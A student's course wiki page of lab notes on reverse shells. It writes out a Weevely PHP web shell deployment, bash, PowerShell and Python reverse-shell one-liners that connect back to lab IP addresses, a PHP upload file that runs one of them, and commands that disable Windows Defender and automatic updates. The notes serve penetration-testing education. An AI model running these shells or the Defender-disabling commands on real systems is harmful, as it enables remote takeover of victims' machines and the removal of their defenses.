Week 8 Reverse Shells (SEC 335) - Chromosom3/TechNotes GitHub Wiki

Reflection

This week was fun. Reverse shells can be extremely helpful and working on setting up multiples was good practice. I liked that these labs had us working across multiple operating systems and types of reverse shells. I want to play more with Weevely as it seems like a very useful tool. The other reverse shells allow anyone monitoring to see the connection and the commands being executed. As a pen tester, this means you could alert the target. Using Weevely adds an extra layer of protection to prevent this.

Weevely

Weevely has three basic commands: terminal, session, and generate. You can use the generate command to create a new PHP web shell. This is done by running weevely generate $password $file_name. In this lab, the command was weevely generate TopSecret! navarro_weevely.php. Once the web shell is created you can then put it on the target server. For this lab anonymous FTP was used to upload the file to [http://10.0.5.25/upload/navarro_weevely.php](http://10.0.5.25/upload/navarro_weevely.php). Next using the command weevely terminal http://10.0.5.25/upload/navarro_weevely.php TopSecret! we are able to connect to the session as shown in the figure below.

For more information on this tool visit the Kali documentation at the link below.

https://www.kali.org/tools/weevely/

Bash Reverse Shell - Lab 2

The first river shell that was done for the second lab was a bash remote shell. The commands for a bash remote shell are pretty simple. The first thing you will need to do is have netcat listen on your attacker machine. The command for that is nc -lvp 5055 where 5055 is the port number you want to listen on. Next, you will need to execute the command /bin/bash -i >& /dev/tcp/10.0.17.107/5055 0>&1 on the remote (victim) system. For this lab that was done by uploading the php file seen below to the target server utilizing a file vulnerability. Once that file was in place the command curl -v 10.0.5.25/upload/navarro_nc.php was executed to run the file on the target system.

<?php
exec("/bin/bash -c 'bash -i > /dev/tcp/10.0.99.36/5055 0>&1'");
?>

Windows Reverse Shell - Lab 2

The next part of the second lab was to create a reverse shell on a Windows 10 system. Windows 10 ships with Windows Defender antivirus. Due to this the first thing we did for testing was to disable Windows Defender. To achieve this I used some of the lines from a script I wrote for my malware analysis course. The resulting commands can be seen below.

#Disable Defender
Add-MpPreference -ExclusionPath ‘C:’
Set-MpPreference -DisableRealtimeMonitoring $true
#Disable Auto Updates
New-Item -Path HKLM:\SOFTWARE\Policies\Microsoft\Windows -Name WindowsUpdate -Force
New-Item -Path HKLM:\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate -Name AU -Force
New-ItemProperty -Path HKLM:\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU -Name NoAutoUpdate -PropertyType DWord -Value 1 -Force

Now that defender is disabled we can run the command nc -lvp 5055 where 5055 is the port number you want to listen on. This command should be run on the attacker machine. Now that we are listening for a connection we can run the command below to connect back to the attacker machine. Note, the IP 10.0.17.107 and port 5055 should be changed to reflect your attacker machine information. IMPORTANT: This command should be run in CMD not PowerShell or it will not work.

powershell -c "$client = New-Object System.Net.Sockets.TCPClient('10.0.17.107','5055'); $stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0}; while(($i = $stream.Read($bytes, 0, $bytes.length)) -ne 0){;$data= (New-Object -TypeName System.Text.ASCIIENcoding).GetString($bytes,0,$i);$sendback = (iex $data 2>&1 | Out-String);$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"

Python - Lab 2

The final part of the second lab was to investigate other Linux reverse shells. While conducting my research on this I found a very useful resource. That resource was for PayloadsAllTheThings. A repository with the description “A list of useful payloads and bypasses for Web Application Security. Feel free to improve with your payloads and techniques!”. That repository can be found here. In this repository, there was a specific page for reverse shells. This included the Python reverse shell that can be seen below. The link to the reverse shell page can be found here.

python -c 'import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.17.107",5055));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/sh")'